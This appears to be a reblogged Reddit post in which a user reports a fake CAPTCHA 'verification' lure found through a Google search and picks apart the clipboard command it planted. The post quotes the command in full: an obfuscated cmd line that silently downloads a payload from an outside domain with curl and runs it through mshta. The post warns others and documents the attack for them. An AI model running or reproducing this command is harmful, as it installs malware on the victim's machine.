So I was looking for Gallium prices and I clicked the 6th link on the first page on google Really damn long link that's supposed to go to https://strategicmetalsinvest.com/gallium-prices/. And I'm met with a Captcha, obviously after I click, it says further verification needed and gives me instructions that boil down to open run, paste something, and hit enter. I know about this particular vector so I don't follow those instructions and instead open up a new plain text to see what exactly it threw in my clipboard and its the following command (please do not run this unless you know what you are doing):
%COMSPEC% /c s^t^a^r^t "" /min %COMSPEC% /c "(for /f "delims=" %E in ('echo %LocalAppData%\Voter.pdf') do ^c^u^r^l^ -skLo "%E" 35613analytics.com/uuu && ^m^s^h^t^a^ "%E")"
So my interest is piqued and I start googling to find out what all of this does. COMSPEC opens up cmd.exe and the /c flag is meant to close the cmd window right after the command is run. The carrots (^) obfuscating start apparently are invisible to the terminal so all it sees is start which opens another cmd.exe in a minimized state presumably to keep the user unaware. At this point I assume the first cmd.exe would terminate and the minimized second one would continue the attack. There's another /c to terminate the new cmd after its done. Then there's an interesting block of code that wasn't obvious to me so I'll run through my thought process.
A few things stood out to me %LocalAppData%\Voter.pdf, curl, and mshta. I checked the Local App Data folder to see if there's possibly some program that stores like keys or passwords at the specified file name and there's nothing there, I know curl is a download command so it must pull some payload from the 35613analytics site and then do something with it. I google mshta and its a command to run HTA files (html application?) which I didn't even know existed. I get to this point and I'm stumped because I know very little about hacking and even less about microsoft terminal magic so I turn to chatgpt.
Chatgpt tells me the inner (for /f ...) part sets a var %E to %LocalAppData%\Voter.pdf and then feeds that to the curl command along with a few flags and the 35613analytics address which outputs the Voter.pdf file at the LocalAppData location and then feeds that file address to mshta which (quoting from chatgpt) "Even though the file is named .pdf, mshta will treat it as executable script if it contains HTA/JavaScript".
I found that fascinating because that seems like a horrible way to design a utility, but also I heard about that adobe pdf and javascript exploit where attackers get arbitrary code execution from someone opening a bad pdf on an at risk pdf reader, so I thought this might be interesting to you guys. I checked virus total, any run, and joes sandbox to see if the website or filename were flagged as malicious but got no results so I think this post might be the first or one of the first reports on this particular live attack. I'm also curious as to what's in the payload but I have no way of safely downloading and examining it and I sure as hell am not gonna run any fragment of that command. So if anyone has the capabilities to safely examine the payload I'd love to know what horrible things it would have done to my win 10 pc. Oh btw I checked the website out and the main page is just blank with "OK" output on it in plaintext and the /uuu subdomain is just a white page with no html at all. Also sorry if this is the wrong subreddit or format for this I wasn't sure where else to post.
[link] [comments]
from hacking: security in practice https://ift.tt/ylpj90H
Comments
Post a Comment